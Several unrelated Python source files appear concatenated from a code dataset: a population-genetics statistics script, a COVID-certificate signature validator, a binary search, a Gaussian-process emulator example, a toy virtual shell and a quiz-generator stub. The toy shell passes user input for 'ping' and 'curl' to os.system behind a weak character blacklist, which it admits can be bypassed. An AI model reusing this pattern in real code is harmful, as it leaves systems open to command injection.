NAM_list = ['A-50010-1', 'A-50010-3', 'A-50010-4', 'A-50036-2',
            'A-50201-1-1', 'A-50638-1', 'A-50652-1', 'A-52339-1',
            'A-52621-1', 'CA-CHAT-1', 'CA-CHAT-3', 'CA-N0L-1',
            'CA-N0L-3', 'CA-N0P-1', 'CA-N0P-3', 'CA-N8H', 'CA-N8H-2',
            'CA-N8H-3', 'CA-N8H-5', 'CA-N8H-7', 'CA-N8H-8', 'CA-NOL-11',
            'CA-NOP1-J0-1', 'CA-NOP_2CO', 'CA-NOP_2CO-12',
            'CA-NOP_2CO-5', 'CA-NOP_2CO-7', 'CA-NOP_2CO-9',
            'CA-NOR-1B0-6', 'I-61851', 'M2.001', 'M55901-1',
            'M9.001', 'MKy7', 'N-68735-17', 'N-68735-1',
            'NRRL13649', 'NRRL47509', 'NRRL47511', 'Cg151NY82']
BR_list = ['BR-19920-1', 'BR-40000-1', 'BR-73000-1', 'BR-73800-1',
           'BR-73850-1', 'BR-75800-1', 'BR-75900-1', 'BR-75960-1',
           'BR-76170-2', 'BR-76170-3', 'BR-79550-1', 'BR-85807-1',
           'BR-85925-1', 'BR-85925-2', 'BR-85955-2', 'BR-87120-1',
           'BR-98250-1', 'BR-98290-1', 'CG-1P_1M', 'JAB2', 'M5.001']
EUR_list = ['ARG-2301-11', 'ARG-2306-1', 'ARG-2349-1', 'ARG-2349-3',
            'ARG-2700-1', 'ARG-2700-2', 'ARG-2700-5', 'ARG-2700-6',
            'ARG-5133-12', 'ARG-5133-14', 'ARG-5133-2',
            'ARG-5133-21', 'ARG-5133-23', 'ARG-5133-25-1',
            'ARG-5133-27-1', 'ARG-5133-28-2', 'ARG-X5196-1',
            'ARG-X5196-4', 'CBS252.59',
            'CR-10342-4', 'CR-10342-7', 'CR-10344-2', 'CR-10360-1',
            'CR-10360-6', 'CR-10370-50', 'CR-10370-68',
            'CR-10370-75', 'CR-10370-81', 'CR-31511-1', 'CR-31511-8',
            'CR-34000-1', 'CR-34000-3', 'CR-34310-2', 'CR-34543-10',
            'CR-34543-1', 'CR-34543-4', 'CR-34543-5', 'CR-34550-2',
            'CR-35214-1', 'CR-35430-1', 'CR-35430-2', 'CR-42223-13',
            'CR-42223-3', 'CR-42230-1', 'CR-42230-5', 'CR-42230-9',
            'CR-43000-1', 'CR-43280-1', 'CR-43380-1', 'CR-43500-11',
            'CR-43500-13', 'CR-43500-2', 'CR-43500-4', 'CR-43500-9',
            'CR-43532-2', 'CR-49284-5', 'CRO-I-35', 'DMSZ-63127',
            'F-40300-1', 'F-40300-2', 'F-40400-1', 'F-40400-2',
            'F-40400-3', 'F-40400-5', 'F-40400-6', 'F-40400-8B',
            'F-40400-9', 'F-64330-1', 'F-64330-12', 'F-64330-13B',
            'F-64330-15', 'F-64330-17', 'F-64330-20', 'F-64330-21',
            'F-64330-4', 'F-64330-8', 'F-64330-9', 'F-64370-1',
            'F-64370-2', 'F-64410-1', 'F-64410-11', 'F-64410-18',
            'F-64410-20', 'F-64410-4', 'F-64410-7', 'F-64410-8',
            'FBH-76290', 'P-7565-072-1', 'P-7565-072-8', 'SI-9223-1',
            'SI-9223-3', 'SP-36820-5', 'SW-8046-1', 'SW-8046-11',
            'SW-8046-3B', 'SW-8046-6', 'SW-8046-8', 'SW-8046-9',
            'Sl-9000-1B', 'Sl-9253-1']
# Single haploid outgroup sample used to orient alleles.
OUTGROUP = 'C_navitas'
#### OPEN VCF FILE AND DEFINE STRUCTURE OBJECT #########################
VCF = egglib.io.VCF(fname)
samples = VCF.get_samples() # extract list of sample names
def find_idx(names):
    """Map sample names to their column indices in the VCF.

    Names absent from the VCF are reported on stdout and skipped.
    """
    indices = []
    for sample_name in names:
        if sample_name in samples:
            indices.append(samples.index(sample_name))
        else:
            print('missing:', sample_name)
    return indices
# Resolve each population's sample indices and record the counts found.
NAM_idx = find_idx(NAM_list)
EUR_idx = find_idx(EUR_list)
BR_idx = find_idx(BR_list)
OTG_idx = samples.index(OUTGROUP)
log = open('results.txt', 'w')
log.write(f'NAM population: listed={len(NAM_list)} found={len(NAM_idx)}\n')
log.write(f'EUR population: listed={len(EUR_list)} found={len(EUR_idx)}\n')
log.write(f'BR population: listed={len(BR_list)} found={len(BR_idx)}\n')
# Build the egglib population structure: three ingroup populations of
# haploid individuals plus the single outgroup sample.
struct = egglib.struct_from_dict(
    {None: { # ingroup with a single cluster
        'NAM': {f'NAM{i+1}': [idx] for [i, idx] in enumerate(NAM_idx)},
        'EUR': {f'EUR{i+1}': [idx] for [i, idx] in enumerate(EUR_idx)},
        'BR': {f'BR{i+1}': [idx] for [i, idx] in enumerate(BR_idx)}
    }},
    { 'OTG': [OTG_idx] } # outgroup with a single (haploid) individual
)
assert struct.get_populations() == ['NAM', 'EUR', 'BR']
##### CREATE COMPUTESTATS OBJECTS ######################################
# One ComputeStats per analysis scope: whole sample, each single
# population, and each pair of populations.
cs_dict = {
    'all': egglib.stats.ComputeStats(struct=struct, multi=True, triconfig_min=10),
    'NAM': egglib.stats.ComputeStats(struct=struct.subset(pops=['NAM']), multi=True),
    'EUR': egglib.stats.ComputeStats(struct=struct.subset(pops=['EUR']), multi=True),
    'BR': egglib.stats.ComputeStats(struct=struct.subset(pops=['BR']), multi=True),
    'NAM-EUR': egglib.stats.ComputeStats(struct=struct.subset(pops=['NAM', 'EUR']), multi=True),
    'NAM-BR': egglib.stats.ComputeStats(struct=struct.subset(pops=['NAM', 'BR']), multi=True),
    'EUR-BR': egglib.stats.ComputeStats(struct=struct.subset(pops=['EUR', 'BR']), multi=True)}
# Register which statistics each scope should accumulate.
cs_dict['all'].add_stats('triconfig')
for key in 'all', 'NAM', 'EUR', 'BR':
    cs_dict[key].add_stats('thetaW', 'Pi', 'D', 'Dfl', 'F', 'Hsd')
for key in 'all', 'NAM-EUR', 'NAM-BR', 'EUR-BR':
    cs_dict[key].add_stats('FstWC', 'Dj')
for key in 'NAM-EUR', 'NAM-BR', 'EUR-BR':
    cs_dict[key].add_stats('Dxy', 'Da', 'numSpd', 'numShA', 'numShP')
for cs in cs_dict.values():
    cs.add_stats('nseff', 'nseffo', 'lseff', 'lseffo', 'S', 'So')
##### COMPUTE STATISTICS FROM ALL SITES ################################
##### first, without filtering, then with filtering ####################
site = egglib.Site()
cs_site = egglib.stats.ComputeStats(struct=struct)
cs_site.add_stats('Atot', 'Aing', 'ns_site', 'ns_site_o')
# Repeat the full scan with increasing minimal distances between retained
# sites (0 = keep everything) to assess the effect of linkage.
for spacer in [0, 100000, 200000, 500000]:
    log.write(f'\n*** minimal spacer: {spacer} ***\n\n')
    VCF = egglib.io.VCF(fname)
    ctg = None
    # Counters for the misorientation estimate: n1 = sites fixed in the
    # ingroup with a mutation in the outgroup, n3/n4 = tri-/quadri-allelic.
    n1 = 0
    n3 = 0
    n4 = 0
    while VCF.read():
        if VCF.get_chrom() != ctg:
            ctg = VCF.get_chrom()
            last = -spacer-1
        # Enforce the minimal spacing between retained sites.
        if VCF.get_pos() < last+spacer:
            continue
        last = VCF.get_pos()
        # Missing calls and spanning deletions become 'N'.
        genos = ['N' if i in ([None], ['*']) else i[0] for i in VCF.get_genotypes()]
        site.from_list(genos, egglib.alphabets.DNA)
        for cs in cs_dict.values():
            cs.process_site(site)
        # computing misorientation rate
        res = cs_site.process_site(site)
        if res['Aing'] == 2 and res['Atot'] > 2:
            # NOTE(review): ``sys`` must be imported at module level for
            # this abort path to work.
            sys.exit('STOP! third allele in outgroup found!')
        if res['Aing'] == 3: n3 += 1
        if res['Aing'] == 4: n4 += 1
        if res['Aing'] == 1 and res['Atot'] == 2: n1 += 1
    # Collect all computed statistics and write them to the log and to a
    # per-spacer observed-statistics table.
    stats = {}
    for key, cs in cs_dict.items():
        log.write(f'{key}\n')
        for stat, value in cs.results().items():
            log.write(f' {stat}: {value}\n')
            stats[f'{key}_{stat}'] = value
    print('number of polymorphic sites:', stats['all_S'], 'three alleles:', n3, 'four alleles:', n4, 'fixed with mutation in outgroup:', n1)
    with open(f'obs_spacer_{spacer}.txt', 'w') as f:
        header = 'all_Dj all_Hsd all_F all_Pi all_D all_Dfl all_FstWC all_thetaW NAM_Hsd NAM_F NAM_Pi NAM_D NAM_Dfl NAM_thetaW EUR_Hsd EUR_F EUR_Pi EUR_D EUR_Dfl EUR_thetaW BR_Hsd BR_F BR_Pi BR_D BR_Dfl BR_thetaW NAM-EUR_numShP NAM-EUR_numSpd NAM-EUR_Da NAM-EUR_Dj NAM-EUR_Dxy NAM-EUR_numShA NAM-EUR_FstWC NAM-BR_numShP NAM-BR_numSpd NAM-BR_Da NAM-BR_Dj NAM-BR_Dxy NAM-BR_numShA NAM-BR_FstWC EUR-BR_numShP EUR-BR_numSpd EUR-BR_Da EUR-BR_Dj EUR-BR_Dxy EUR-BR_numShA EUR-BR_FstWC'
        plus = 'ABB ABA AAB PAA PAB APA APB AAP ABP PPA PAP APP PPP'
        f.write(header + ' ' + plus + '\n')
        obs = [str(stats[key]) for key in header.split()]
        obs.extend(map(str, stats['all_triconfig']))
        f.write(' '.join(obs) + '\n')
#####
log.close()
| flaviarogerio/demographic | cp_stats4.py | cp_stats4.py | py | 7,729 | python | en | code | 0 | github-code | 36 |
35076398379 | """This file contains the signature validator abstraction"""
import base64
import json
from cose.headers import KID
from cose.keys.keyops import VerifyOp
from cose.messages import Sign1Message
from cose.keys import CoseKey
from cose.algorithms import Es256, Ps256
from cose.keys.keytype import KtyEC2, KtyRSA
from cose.keys.keyparam import KpKty, KpKeyOps
from cose.keys.keyparam import KpAlg, EC2KpX, EC2KpY, EC2KpCurve, RSAKpE, RSAKpN
from cose.keys.curves import P256
from cose.exceptions import CoseException
from cryptography import x509
from cryptography.hazmat.primitives.asymmetric import ec, rsa
from cryptography.utils import int_to_bytes
from classes.TrustList import TrustList
class SignatureValidator:
    """Validate COSE Sign1 signatures against a trust list of signer certificates."""

    def __init__(self, trust_list: TrustList):
        self._trust_list = trust_list

    def validate(self, payload: bytes):
        """Validates the signature, or returns the errors.

        Returns a dict with a ``valid`` flag and, on failure, an ``error``
        dict carrying a ``type`` tag and a ``message``.
        """
        try:
            message = Sign1Message.decode(payload)
            kid = self._get_kid(message)
            print(f"KID = {kid}")
            dsc = self._trust_list.find(kid)
            # Bug fix: check the lookup result *before* dereferencing it.
            # The original called dsc.certificate() unconditionally, so an
            # unknown KID raised AttributeError (reported as a generic
            # "COSE" error) instead of the intended "TRUST-LIST" error below.
            cert: x509.base = dsc.certificate() if dsc is not None else None
            if cert is None:
                return {
                    "valid": False,
                    "error": {
                        "type": "TRUST-LIST",
                        "message": f"KID {kid} not found in the trust-list"
                    }
                }
            message.key = self._get_key(cert)
            if message.verify_signature():
                return {
                    "valid": True,
                    "error": None
                }
            return {
                "valid": False,
                "error": "Invalid signature! Reason: unknown."
            }
        except UnicodeDecodeError as err:
            return {
                "valid": False,
                "error": {
                    "type": "UNICODE",
                    "message": err
                }
            }
        except json.decoder.JSONDecodeError as err:
            return {
                "valid": False,
                "error": {
                    "type": "JSON",
                    "message": err
                }
            }
        except (CoseException, AttributeError, TypeError) as err:
            # NOTE(review): the exception object itself is returned as the
            # "message"; callers that serialise this dict may want str(err).
            return {
                "valid": False,
                "error": {
                    "type": "COSE",
                    "message": err
                }
            }

    @staticmethod
    def _get_kid(message) -> str:
        """Return the base64-encoded KID, preferring the protected header."""
        if KID in message.phdr.keys():
            return base64.b64encode(message.phdr[KID]).decode("UTF-8")
        return base64.b64encode(message.uhdr[KID]).decode("UTF-8")

    @staticmethod
    def _get_key(cert: x509.base) -> CoseKey:
        """Build the CoseKey matching the certificate's public-key type."""
        if isinstance(cert.public_key(), rsa.RSAPublicKey):
            return CoseKey.from_dict(
                {
                    KpKeyOps: [VerifyOp],
                    KpKty: KtyRSA,
                    KpAlg: Ps256,  # RSASSA-PSS-with-SHA-256-and-MGF1
                    RSAKpE: int_to_bytes(cert.public_key().public_numbers().e),
                    RSAKpN: int_to_bytes(cert.public_key().public_numbers().n)
                }
            )
        elif isinstance(cert.public_key(), ec.EllipticCurvePublicKey):
            return CoseKey.from_dict(
                {
                    KpKeyOps: [VerifyOp],
                    KpKty: KtyEC2,
                    EC2KpCurve: P256,  # Ought to be pk.curve - but the two libs clash
                    KpAlg: Es256,  # ecdsa-with-SHA256
                    EC2KpX: int_to_bytes(cert.public_key().public_numbers().x),
                    EC2KpY: int_to_bytes(cert.public_key().public_numbers().y)
                }
            )
        else:
            raise Exception(f"Algorithm unsupported: { cert.signature_algorithm_oid }")
| ryanbnl/eu-dcc-diagnostics | classes/SignatureValidator.py | SignatureValidator.py | py | 3,969 | python | en | code | 9 | github-code | 36 |
36754576461 | # Binary Search
def solution(A, value):
    """Recursively binary-search sorted list A for value.

    Returns the matching element, or None (after printing 'Not found it')
    when the value is absent.

    Fixes over the original: recursive results are now returned (deep hits
    previously yielded None), the empty-list case is checked before indexing
    A[0] (previously IndexError on []), the found-message f-string prefix is
    restored, and boolean `and` replaces bitwise `&`.
    """
    if len(A) == 0:
        print('Not found it')
        return None
    if len(A) == 1:
        if A[0] == value:
            print(f'found it: {A[0]}')
            return A[0]
        print('Not found it')
        return None
    mid = len(A) // 2
    print(A[mid])  # probe trace, as in the original
    if A[mid] == value:
        print(f'found it: {A[mid]}')
        return A[mid]
    if A[mid] > value:
        return solution(A[:mid], value)
    return solution(A[mid + 1:], value)
# Demo run: search a small sorted list for 8.
A = list(range(1, 11))
x = solution(A, 8)
| Quantanalyst/SoftwareEngineeringNotes | Data Structure and Algorithms/Popular Questions/BinarySearch.py | BinarySearch.py | py | 649 | python | en | code | 0 | github-code | 36 |
38488870579 | #!/usr/bin/env python3
#
# Bonus. GPE auto-training + GSA using external (from publication) dataset loaded from json file
#
import os
from gpytorch.likelihoods import GaussianLikelihood
from gpytorch.means import LinearMean
from gpytorch.kernels import MaternKernel, ScaleKernel
from GPErks.gp.data.dataset import Dataset
from GPErks.gp.experiment import GPExperiment
from GPErks.gp.mean import LinearMean
from GPErks.log.logger import get_logger
from GPErks.serialization.path import posix_path
from GPErks.train.emulator import GPEmulator
from GPErks.utils.random import set_seed
from GPErks.perks.gsa import SobolGSA
def main():
    """End-to-end demo: load an external dataset from JSON, auto-train a GP
    emulator for one scalar feature ("EDV"), then run Sobol global
    sensitivity analysis through the trained emulator."""
    get_logger()
    seed = 8
    set_seed(seed)
    device = "cpu"
    # This new method loads your dataset into a dictionary where keys = features, values = Dataset objects
    # (each Dataset is built to create the experiment that will emulate the corresponding scalar feature (key))
    datasets = Dataset.build_from_file(posix_path(os.getcwd(), "data", "datasets", "Stefano_8p_sham.json"))
    features = list(datasets.keys())
    print(features) # available features to be emulated
    # # Note: if you want to create a .json file containing your dataset, you can do so like this:
    # X = np.loadtxt(data_dir / "X.txt", dtype=float)
    # Y = np.loadtxt(data_dir / "Y.txt", dtype=float)
    # xlabels = read_labels_from_file(data_dir / "xlabels.txt")
    # ylabels = read_labels_from_file(data_dir / "ylabels.txt")
    # data_dct = {
    # "X_train": X.tolist(),
    # "Y_train": Y.tolist(),
    # # "X_val": X_val.tolist(), # (if available, otherwise can omit this dct key)
    # # "Y_val": Y_val.tolist(), # (if available, otherwise can omit this dct key)
    # # "X_test": X_test.tolist(), # (if available, otherwise can omit this dct key)
    # # "Y_test": Y_test.tolist(), # (if available, otherwise can omit this dct key)
    # "x_labels": xlabels, # (if available, otherwise can omit this dct key)
    # "y_labels": ylabels, # (if available, otherwise can omit this dct key)
    # # "l_bounds": a list here (if available, otherwise can omit this dct key)
    # # "u_bounds": a list here (if available, otherwise can omit this dct key)
    # "info": "A short description about the dataset"
    # }
    # with open(Path(os.getcwd())/"datasetname.json", "w") as f:
    # json.dump(data_dct, f, indent=4)
    #
    # # Also note that there is already a utility function that does this for you:
    # # from GPErks.utils.jsonfiles import create_json_dataset_from_arrays
    feature = "EDV" # we will emulate just one feature as an example
    # GPE auto-training
    print(f"\nEmulating target feature: {feature}")
    dataset = datasets[feature]
    likelihood = GaussianLikelihood()
    # NOTE(review): LinearMean resolves to GPErks.gp.mean.LinearMean here --
    # the later import shadows gpytorch.means.LinearMean (see file imports).
    mean = LinearMean(degree=1, input_size=dataset.input_size, bias=True)
    covariance = ScaleKernel(MaternKernel(ard_num_dims=dataset.input_size))
    metrics = []
    experiment = GPExperiment(
        dataset,
        likelihood,
        mean,
        covariance,
        metrics=metrics,
        seed=seed
    )
    emulator = GPEmulator(experiment, device)
    emulator.train_auto() # you could use a more manual approach here with early stopping etc.
    msg = experiment.print_stats()
    print(f"\nFitted emulator hyperparameters:{msg}")
    # GSA
    gsa = SobolGSA(dataset, n=1024, seed=seed)
    # the following method is used to perform GSA whenever a (trained) emulator object is available, also covering
    # the case where it was trained using an externally imported dataset as in this example
    gsa.estimate_Sobol_indices_with_emulator(emulator, n_draws=1000)
    gsa.summary()
    gsa.correct_Sobol_indices(threshold=0.01)
    gsa.plot()
    gsa.plot_donut()
    gsa.plot_fancy_donut()
    gsa.plot_heatmap()
    gsa.plot_network()
# Script entry point.
if __name__ == "__main__":
    main()
| stelong/GPErks | examples/example_bonus.py | example_bonus.py | py | 3,888 | python | en | code | 3 | github-code | 36 |
30807564816 | import copy
import os
import sys
# define our clear function
def clear():
    """Clear the terminal: 'cls' on Windows (os.name == 'nt'), 'clear' elsewhere."""
    command = 'cls' if os.name == 'nt' else 'clear'
    _ = os.system(command)
def systemStrip(input):
    """Best-effort sanitiser for strings handed to os.system().

    Extends the original blacklist (& | ; ! \\) with $, backticks, <, >,
    and newlines, which also allow command substitution/chaining; also fixes
    the original `.strip("")`, which stripped nothing.

    NOTE(review): blacklisting shell metacharacters is inherently fragile;
    prefer subprocess.run([...], shell=False) with an argument list.
    """
    dangerous = "&|;!\\$`<>\n\r"
    return ''.join(ch for ch in input.strip() if ch not in dangerous)
def newFile(name, par, data):
    """Create a CustomFile named *name* under parent *par*, pre-filled with *data*."""
    created = CustomFile(str(name), par)
    created.setContent(str(data))
    return created
class CustomFile:
    """A leaf node of the virtual filesystem: a named file with text content."""

    def __init__(self, name, par):
        self.parent = par  # owning Directory (or None)
        self.name = name
        self.data = " "    # file body; a single space when freshly created
        self.type = "File" # tag the shell uses to dispatch on node kind

    def setContent(self, tempData):
        """Replace the whole file body."""
        self.data = tempData

    def getContent(self):
        """Return the current file body."""
        return self.data

    def appendContent(self, input):
        """Append *input* (stringified) to the file body."""
        self.data += str(input)
class Directory:
    """A branch node of the virtual filesystem: named, with child nodes.

    Children may be Directory or CustomFile instances, distinguished by
    their ``type`` attribute.
    """

    def __init__(self, name, par=None):
        # Equivalent to the original's two-step init: parent stays None
        # unless an explicit parent is supplied.
        self.parent = par
        self.children = []
        self.name = name
        self.type = "Directory"

    def printChildren(self, showHidden):
        """Print child names, each followed by a tab; names starting with
        '.' are omitted unless showHidden is true."""
        line = ""
        for child in self.children:
            if showHidden or not str(child.name).startswith("."):
                line += str(child.name) + "\t"
        print(line)

    def hasNext(self):
        """Return True if any child is a Directory."""
        return any(child.type == "Directory" for child in self.children)

    def hasParent(self):
        """Return True if this directory has a parent (i.e. is not the root)."""
        return self.parent is not None

    def next(self):
        """Return the first Directory child, or None."""
        for child in self.children:
            if child.type == "Directory":
                return child
        return None

    def nextDirectory(self, name):
        """Return the Directory child with the given name, or None.

        (Parameter renamed from ``str``, which shadowed the builtin.)
        """
        for child in self.children:
            if child.type == "Directory" and child.name == name:
                return child
        return None

    def childrenNames(self):
        """Return the list of child names, in insertion order."""
        return [child.name for child in self.children]
# Shell state: start at the root directory "~".
currentDirectory = Directory("~")
currentPath = [currentDirectory.name]
def refreshPath():
    """Rebuild the path from the filesystem root down to currentDirectory.

    Returns the list of directory names, root first. Fixes the original's
    wasteful creation of a throwaway Directory("ptr", ...) node (used only
    as a pointer to currentDirectory) and drops the dead local assignment
    `currentPath = currentPath2`, which never updated the module global.
    """
    node = currentDirectory
    names = []
    while node.hasParent():
        names.append(str(node.name))
        node = node.parent
    names.append(str(node.name))
    names.reverse()
    return names
def printPath():
    """Print and return the current working path rendered as 'root/.../cwd/'."""
    segments = refreshPath()
    rendered = "".join(str(segment) + "/" for segment in segments)
    print(rendered)
    return rendered
'''
custom heirarchy start
'''
# Seed the in-memory filesystem with a demo tree:
#   ~/Documents/HelloWorld2.txt, ~/Documents/SpecialDocs/,
#   ~/Downloads/, ~/UserInfo/, ~/HelloWorld.txt
DocumentsInit = Directory("Documents", currentDirectory)
SpecialDocs = Directory("SpecialDocs", DocumentsInit)
Hello2 = CustomFile("HelloWorld2.txt", DocumentsInit)
Hello2.setContent("Hello, Programmer!")
DocumentsInit.children.append(Hello2)
DocumentsInit.children.append(SpecialDocs)
currentDirectory.children.append(DocumentsInit)
currentDirectory.children.append(Directory("Downloads", currentDirectory))
currentDirectory.children.append(Directory("UserInfo", currentDirectory))
currentDirectory.children.append(newFile("HelloWorld.txt", currentDirectory, "Hello, World!"))
'''
custom heirarchy end
'''
# Interactive shell loop: read a command line, tokenise it, and dispatch on
# the first token. Tokens are produced by splitting on spaces, then on "-"
# (so "-a" flags become bare letters), then on "/".
while(True):
    inputRaw = input("user@virtualShell: ")
    inputRaw = inputRaw.strip()
    inputArray0 = inputRaw.split(" ")
    inputArray0t = []
    inputArray1 = []
    for i in inputArray0:
        temp = i.split("-")
        for x in temp:
            inputArray0t.append(x)
    for i in inputArray0t:
        temp = i.split("/")
        for x in temp:
            inputArray1.append(x)
    inputFirst = inputArray1[0]
    # NOTE(review): looks like leftover debug output of the token list.
    print(str(inputArray1))
    # cd: change directory ("~" = root, ".." = parent, otherwise a child name).
    # NOTE(review): the loop variable `i` is reassigned inside the body.
    if str(inputFirst) == "cd":
        inputArray1.pop(0)
        for i in range(0, len(inputArray1)):
            if len(inputArray1) > 0 and inputArray1[0] == "~":
                while currentDirectory.parent is not None:
                    currentDirectory = currentDirectory.parent
                    refreshPath()
            elif len(inputArray1) > 0 and inputArray1[0] in currentDirectory.childrenNames():
                i = currentDirectory.childrenNames().index(inputArray1[0])
                x = currentDirectory.children[i]
                if x.type == "Directory":
                    currentDirectory = x
                    refreshPath()
                elif x.type == "File":
                    print('\"' + inputArray1[0] + '\"' + ' is not a directory')
                else:
                    print('\"' + inputArray1[0] + '\"' + ' is not a directory')
            elif inputArray1[0] == "..":
                if currentDirectory.parent is not None:
                    currentDirectory = currentDirectory.parent
                    refreshPath()
                else:
                    print("Root directory has no parents, it's like batman")
            else:
                print("not a valid Directory")
                refreshPath()
            inputArray1.pop(0)
        if len(inputArray1) == 0:
            printPath()
    # ls: list children; any "a"/"A" character among the raw input (from
    # index 2 on) reveals dotfiles.
    elif str(inputFirst) == "ls":
        inputArray1.pop(0)
        argsArray = [""]
        for i in range(2, len(inputRaw)):
            argsArray += inputRaw[i]
        if "a" in argsArray or "A" in argsArray:
            currentDirectory.printChildren(True)
            #print("revealing hidden files")
        else:
            printPath()
            currentDirectory.printChildren(False)
    # cat: print the content of the first matching File child.
    elif str(inputFirst) == "cat":
        inputArray1.pop(0)
        for i in range(0, len(inputArray1)):
            if len(inputArray1) > 0 and inputArray1[0] in currentDirectory.childrenNames():
                i = currentDirectory.childrenNames().index(inputArray1[0])
                x = currentDirectory.children[i]
                if x.type == "File":
                    print(x.getContent())
                    refreshPath()
                    break
                else:
                    print("" + x.name + " does not have attribute: 'file_data'")
                    break
    # mkdir: create a child Directory (name must be unique in the cwd).
    elif str(inputFirst).lower() == "mkdir" or str(inputFirst).lower() == "mkDir":
        inputArray1.pop(0)
        currentNames = currentDirectory.childrenNames()
        if len(inputArray1) > 0 and inputArray1[0] in currentNames:
            print("There is already a File or Directory with the given name in the current Directory")
            continue
        for i in range(0, len(inputArray1)):
            if len(inputArray1) > 0:
                currentDirectory.children.append(Directory(inputArray1[0], currentDirectory))
                refreshPath()
                break
    # touch: create an empty child File.
    elif str(inputFirst).lower() == "touch":
        inputArray1.pop(0)
        for i in range(0, len(inputArray1)):
            if len(inputArray1) > 0:
                currentDirectory.children.append(CustomFile(inputArray1[0], currentDirectory))
                refreshPath()
                break
    # cls/clear: wipe the screen (see clear()).
    elif str(inputFirst).lower() == "cls" or str(inputFirst).lower() == "clear":
        inputArray1.pop(0)
        """
        script = '''
        echo "hello"
        cls
        '''
        os.system("bash -c '%s'" % script)
        """
        clear()
    # exit: leave the shell.
    elif str(inputFirst).lower() == "exit":
        sys.exit()
    # vim/kate/gedit: interactively overwrite or append to a File's content.
    elif str(inputFirst).lower() == "vim" or str(inputFirst).lower() == "kate" or str(inputFirst).lower() == "gedit":
        inputArray1.pop(0)
        if len(inputArray1) > 0 and inputArray1[0] in currentDirectory.childrenNames():
            i = currentDirectory.childrenNames().index(inputArray1[0])
            x = currentDirectory.children[i]
            if x.type == "File":
                q1 = input("do you wish to set the content(erasing all old data)? y/n: ")
                if (str(q1)[0:1:1]).lower() == "y":
                    print("Please write content to be written:")
                    q2 = input()
                    x.setContent(str(q2))
                else:
                    q4 = input("do you wish to append to the File? y/n: ")
                    if (str(q4)[0:1:1]).lower() == "y":
                        print("Please write content to be appended:")
                        q3 = input()
                        x.appendContent(str(q3))
    # ping: shell out after stripping some metacharacters (see systemStrip).
    elif str(inputFirst).lower() == "ping":
        inputArray1.pop(0)
        command = str("ping ") + str(inputArray1[0])
        # there is a potential security vulnerability here. If they put ping xxxx && somecommand or the sort && ping
        command = systemStrip(str(command))
        os.system(str(command))
    # echo: print everything after "echo ".
    elif str(inputFirst).lower() == "echo":
        print(str(inputRaw[5::1]))
    # curl: shell out with the sanitised raw command line.
    elif str(inputFirst).lower() == "curl":
        command = inputRaw
        command = systemStrip(str(command))
        os.system(str(command))
    # head: print the first 10 lines of a File (all of them if < 11 lines).
    elif str(inputFirst).lower() == "head":
        inputArray1.pop(0)
        if len(inputArray1) > 0 and inputArray1[0] in currentDirectory.childrenNames():
            i = currentDirectory.childrenNames().index(inputArray1[0])
            x = currentDirectory.children[i]
            if x.type == "File":
                tempData = x.data
                tempDataArr = tempData.splitlines(True)
                if len(tempDataArr) < 11:
                    for x in tempDataArr:
                        print(str(x))
                else:
                    count = 0
                    while count < 10:
                        print(str(tempDataArr[count]))
                        count += 1
                if len(tempDataArr) == 0:
                    print() # intentionally print a single blank line
    # tail: print the last 10 lines of a File.
    # NOTE(review): for files longer than 10 lines the first iteration
    # indexes tempDataArr[fileLength] (one past the end) -- IndexError;
    # probably wants fileLength - 1 - count.
    elif str(inputFirst).lower() == "tail":
        inputArray1.pop(0)
        if len(inputArray1) > 0 and inputArray1[0] in currentDirectory.childrenNames():
            i = currentDirectory.childrenNames().index(inputArray1[0])
            x = currentDirectory.children[i]
            if x.type == "File":
                tempData = x.data
                tempDataArr = tempData.splitlines(True)
                if len(tempDataArr) < 11:
                    for x in tempDataArr:
                        print(str(x))
                else:
                    count = 0
                    fileLength = int(len(tempDataArr))
                    while count < 10:
                        print(str(tempDataArr[fileLength - count]))
                        count += 1
                if len(tempDataArr) == 0:
                    print() # intentionally print a single blank line
    # rm: delete a File, or a Directory when an "r" flag token is present.
    elif str(inputFirst).lower() == "rm":
        inputArray1.pop(0)
        if len(inputArray1) == 0:
            print("Please give an argument for rm")
        found = False
        for num in range(0, len(inputArray1)):
            if len(inputArray1) > 0 and inputArray1[num] in currentDirectory.childrenNames():
                i = currentDirectory.childrenNames().index(inputArray1[num])
                x = currentDirectory.children[i]
                if x.type == "File":
                    currentDirectory.children.remove(x)
                    found = True
                    break
                if x.type == "Directory" and "r" in inputArray1:
                    currentDirectory.children.remove(x)
                    found = True
                    break
                elif x.type == "Directory":
                    print('Cannot delete, please pass \"-r\" argument in order to delete Directories\n\t*Doing so will also delete all files and folders therein')
                    found = True
                    break
        if not found:
            print("Syntax error: Unable to Locate File")
    # Empty command: just re-prompt.
    elif str(inputFirst).lower() == "":
        continue
    else:
        print('\"' + inputFirst + '\" is not a valid command')
    #printPath()
'''
rm * added
mv *
save functionality *
find command
grep command
system call to SSH #don't want, don't see the use
ftp #don't want, don't see the use
'''
| Treelovah/dev-null | console.py | console.py | py | 12,973 | python | en | code | 0 | github-code | 36 |
9959099201 | import random
import itertools
import math
import json
from functions.counting import counting
from functions.multi_arithematic import multiple_operations_two_ops
from functions.single_arithematic import single_arithematic
from functions.avg_val import average_point_value
from functions.permutation_combination import permutations
from functions.permutation_combination import combinations
from functions.probability import probability_questions
from functions.comparisions import comparison_questions
from functions.logical import logical_questions
from functions.number_theory import number_theory_questions
from functions.graph_theory import generate_graph_theory_questions
from functions.pattern_recognition import pattern_recognition_questions
from functions.geometry import generate_shape_questions
from functions.clock import generate_clock_time_questions
from functions.algorithmic_reasoning import knapsack_questions
from functions.algorithmic_reasoning import greedy_questions
from functions.algorithmic_reasoning import sort_and_median_questions
from functions.algorithmic_reasoning import recursion_questions
from functions.temporal import temporal_questions
from functions.incomplete_question import incomplete_questions
from functions.spatial_reasoning import spatial_reasoning_questions
# Singular -> plural noun lookup. Not referenced in this file -- presumably
# consumed by the question-generation functions (TODO confirm).
plural_dictionary = {
    "fruit": "fruits",
    "apple": "apples",
    "orange": "oranges",
    "banana": "bananas",
    "strawberry": "strawberries",
    "grape": "grapes",
    "vegetable": "vegetables",
    "carrot": "carrots",
    "broccoli": "broccoli",
    "tomato": "tomatoes",
    "potato": "potatoes",
    "cabbage": "cabbages",
    "animal": "animals",
    "dog": "dogs",
    "cat": "cats",
    "elephant": "elephants",
    "giraffe": "giraffes",
    "dolphin": "dolphins",
    "geometry": "geometries",
    "triangle": "triangles",
    "square": "squares",
    "pentagon": "pentagons",
    "hexagon": "hexagons",
    "octagon": "octagons",
    "clock" : "clocks",
}
# Category -> items used to build questions; several items are commented out,
# which keeps the combinatorial question space small. "range" is not read
